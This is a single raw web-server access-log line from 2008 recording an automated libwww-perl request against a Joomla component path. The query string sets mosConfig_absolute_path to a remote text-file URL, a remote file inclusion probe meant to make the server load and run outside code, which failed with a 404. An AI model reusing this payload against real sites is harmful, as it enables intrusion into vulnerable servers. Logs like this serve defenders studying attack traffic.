58.74.175.5 - - [23/Jan/2008:06:55:55 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
